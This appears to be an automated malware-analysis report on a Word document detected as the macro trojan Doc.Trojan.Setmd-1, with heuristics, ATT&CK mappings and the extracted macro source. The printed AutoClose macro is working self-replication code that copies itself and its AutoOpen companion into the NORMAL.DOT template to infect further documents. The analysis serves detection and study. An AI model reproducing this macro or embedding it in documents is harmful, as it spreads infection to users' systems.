Verdict: MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains legacy WordBasic markers and VBA macros, including AutoOpen and AutoClose, indicating a macro-based attack. The AutoClose macro attempts to copy itself and other macros ('AutoOpen', 'yHong') into the NORMAL.DOT template, likely to establish persistence or spread further. The document body discusses company profiles and insurance history, serving as a lure to encourage users to enable macros.
Heuristics (5)
- ClamAV: Doc.Trojan.Setmd-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Setmd-1
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2597 bytes |

SHA-256: 4df361d9ccc111546789e984912d62d689d2d914f23a0d8860e9cb0a3b193e04
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoClose"
'yHong1s
Public Sub MAIN()
Dim TemplateName$
Dim MyFile$
Dim My
Dim OkExist
Dim i
Dim beSave
Dim X
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
' Get normal template name
TemplateName$ = WordBasic.[DefaultDir$](2) + "\NORMAL.DOT"
MyFile$ = WordBasic.[FileName$]()
If InStr(1, MyFile$, "文档") = 1 Then
GoTo The_End
Else
WordBasic.CurValues.FileSaveAs dlg
MyFile$ = dlg.Name
End If
If WordBasic.IsMacro(0) = -1 Then GoTo The_End
My = WordBasic.CountMacros(1)
OkExist = 0
For i = 1 To My
If WordBasic.[MacroName$](i, 1) = "AutoClose" Then OkExist = 1
Next i
If OkExist = 1 Then
WordBasic.Organizer Copy:=1, Source:=MyFile$, Destination:=TemplateName$, Name:="AutoOpen", Tab:=3
WordBasic.Organizer Copy:=1, Source:=MyFile$, Destination:=TemplateName$, Name:="AutoClose", Tab:=3
WordBasic.Organizer Copy:=1, Source:=MyFile$, Destination:=TemplateName$, Name:="yHong", Tab:=1
End If
beSave = 0
If WordBasic.IsDocumentDirty() = -1 Then
X = WordBasic.MsgBox("是否保存对 " + MyFile$ + " 的修改?", "Microsoft Word", 51)
If X = 0 Then
WordBasic.SetDocumentDirty 0
GoTo The_End
End If
If X = 1 Then
GoTo The_End
End If
beSave = 1
End If
If dlg.Format = 0 Then
WordBasic.FileSaveAs Name:=MyFile$, Format:=1, LockAnnot:=0, Password:="", AddToMru:=1, WritePassword:="", RecommendReadOnly:=0, EmbedFonts:=0, NativePictureFormat:=0, FormsData:=0, SaveAsAOCELetter:=0
End If
' copy AutoOpen to active template
If OkExist <> 1 Then
WordBasic.Organizer Copy:=1, Source:=TemplateName$, Destination:=MyFile$, Name:="AutoClose", Tab:=3
WordBasic.Organizer Copy:=1, Source:=TemplateName$, Destination:=MyFile$, Name:="yHong", Tab:=1
beSave = 1
End If
OkExist = 0
For i = 1 To My
If WordBasic.[MacroName$](i, 1) = "AutoOpen" Then OkExist = 1
Next i
If OkExist <> 1 Then
WordBasic.Organizer Copy:=1, Source:=TemplateName$, Destination:=MyFile$, Name:="AutoOpen", Tab:=3
WordBasic.Organizer Copy:=1, Source:=TemplateName$, Destination:=MyFile$, Name:="yHong", Tab:=1
beSave = 1
End If
If beSave = 1 Then WordBasic.FileSave
The_End:
End Sub
Attribute VB_Name = "AutoOpen"
```